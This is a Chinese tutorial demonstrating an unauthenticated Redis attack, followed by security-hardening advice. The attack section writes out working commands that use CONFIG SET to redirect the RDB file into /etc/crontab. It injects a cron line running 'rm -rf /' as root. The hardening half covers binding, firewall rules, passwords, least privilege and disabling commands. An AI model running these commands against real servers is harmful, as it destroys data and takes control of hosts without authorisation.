0%

redis无密码攻击演示及安全加固

通过Redis客户端连接服务与进行操作默认是不需要密码的,任何人只要连上了服务器那么就可以操作Redis里的数据,而且还可以利用confit set来在线修改redis的配置实现攻击。所以对于暴露在公网中的Redis服务器,我们不光要设置密码,还要设置一个足够复杂的密码才可以,因为Redis的连接速度非常快,官方文档中介绍是每秒可以进行150k次破解。设置密码后客户端连接上Redis进行任何操作都需要验证后才可进行。

攻击演示

  1. 通过config set来修改rdb文件的存储路径和文件名
    1
    2
    redis-cli -h 192.168.3.13 config set dir '/etc/'
    redis-cli -h 192.168.3.13 config set dbfilename 'crontab'
  2. 新建一个文本,用于之后redis读取后把这段内容添加到crontab中,文本上下各需要2行回车
    1
    2
    3
    vi /tmp/attack.txt

    * * * * * root rm -rf /
  3. 把标准输入的内容交给redis执行,这个时候crontab已经添加上了attack.txt中的内容
    1
    2
    3
    4
    5
    6
    7
    cat /tmp/attack | redis-cli -h 221.141.14.5 -x set attack  #-x是从标准输入中读取

    # 或者直接在redis中直接设置
    127.0.0.1:6379> FLUSHALL # 清空下
    127.0.0.1:6379> set test "\n*/1 * * * * curl https://www.baidu.com\n"

    redis-cli save #刷新rbd文件,让crontab被立即修改

    安全加固

    1. 网络层加固

    指定 Redis 服务使用的网卡
    默认情况下,Redis 监听 127.0.0.1。如果仅仅是本地通信,请确保监听在本地。

这种方式可以在一定程度上缓解 Redis 未授权访问的风险(例外情况下,如果 Redis 以 root 用户运行,攻击者借助已有的 webshell,就可以利用该 Redis 来反弹 shell 以实现提权)。

在 redis.conf 文件中找到 # bind 127.0.0.1,将前面的 # 去掉,然后保存。

注意:

  • 该操作需要重启 Redis 才能生效。
  • 修改后只有本机才能访问 Redis,也可以指定访问源 IP 来访问 Redis。
    1
    bind 192.168.1.100 10.0.0.1

    2.设置防火墙策略

    如果正常业务中 Redis 服务需要被其他服务器来访问,可以通过 iptables 策略,仅允许指定的 IP 来访问 Redis 服务。
    1
    iptables -A INPUT -s x.x.x.x -p tcp --dport 6379 -j ACCEPT

    3.账号与认证

设置访问密码
在 redis.conf 中找到 requirepass 字段,去掉其注释,并在后面填上需要的密码。Redis 客户端也需要使用此密码来访问 Redis 服务。

打开 /etc/redis/redis.conf 配置文件:

1
requirepass !QE%^E3323BDWEwwwe1839

确保密码的复杂度,配置完毕后重启服务即可生效。

4.服务运行权限最小化

修改 Redis 服务运行账号
请以较低权限账号运行 Redis 服务,并禁用该账号的登录权限。以下操作创建了一个无 home 目录权限,且无法登录的普通账号:

1
2
3
4
useradd -M -s /sbin/nologin [username]

# 以普通用户身份启动
sudo -u [username] redis-server redis.conf

注意:该操作需要重启 Redis 才能生效。

5.服务精细化授权

隐藏重要命令

Redis 无权限分离,其管理员账号和普通账号无明显区分。攻击者登录后可执行任意操作,因此需要隐藏以下重要命令:FLUSHDB, FLUSHALL, KEYS,PEXPIRE, DEL, CONFIG, SHUTDOWN, BGREWRITEAOF, BGSAVE, SAVE, SPOP, SREM, RENAME,DEBUG, EVAL。

另外,在 Redis 2.8.1 及 Redis 3.x (低于 3.0.2) 版本下存在 EVAL 沙箱逃逸漏洞,攻击者可通过该漏洞执行任意 Lua 代码。

下述配置将 config/flushdb/flushall 设置为空,即禁用该命令;也可设置为一些复杂的、难以猜测的名字。

1
2
3
4
rename-command CONFIG ""
rename-command flushall ""
rename-command flushdb ""
rename-command shutdown shotdown_test

保存后,执行 /etc/init.d/redis-server restart 重启生效。

6.安全补丁

定期关注最新软件版本,并及时升级 Redis 到最新版,防止新漏洞被恶意利用。